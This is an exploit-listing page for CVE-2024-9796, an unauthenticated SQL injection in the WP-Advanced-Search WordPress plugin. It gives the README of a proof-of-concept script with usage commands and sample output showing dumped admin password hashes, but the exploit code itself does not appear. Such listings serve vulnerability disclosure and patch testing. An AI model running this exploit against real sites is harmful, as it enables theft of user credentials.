Exploit for SQL Injection in Internet-Formation Wp-Advanced-Search CVE-2024-9796

Name: Exploit for SQL Injection in Internet-Formation Wp-Advanced-Search CVE-2024-9796
Rating: 5 (137 reviews)

2025-06-20 | CVSS 9.8

## https://sploitus.com/exploit?id=F286BCA9-F9DF-5564-9287-FC5DD11F3B3B
# CVE-2024-9796
## WP-Advanced-Search < 3.3.9.2 - Unauthenticated SQL Injection

## Description
The PoC SQL injection will dump WordPress users and hashes.

## Disclaimer:
This script is for educational use only. 

Do not use it for illegal purposes. 

If you do, it’s entirely your responsibility; I am not liable for any misuse.

## More information on the exploit
https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/

## Usage:
```
# Successful attempt
python3 poc.py -i 127.0.0.1
[!] 127.0.0.1 has been PWNed!
admin:$P$H5blBNpO5AVI7eDJJi95E6pso16h981
user:$P$H1Sa1pcnzwWha3G9XH5rkfB6wOcE2a1

# unsuccessful attempt
python3 poc.py -i 127.0.0.1
[!] Doesn't look vulnerable..
```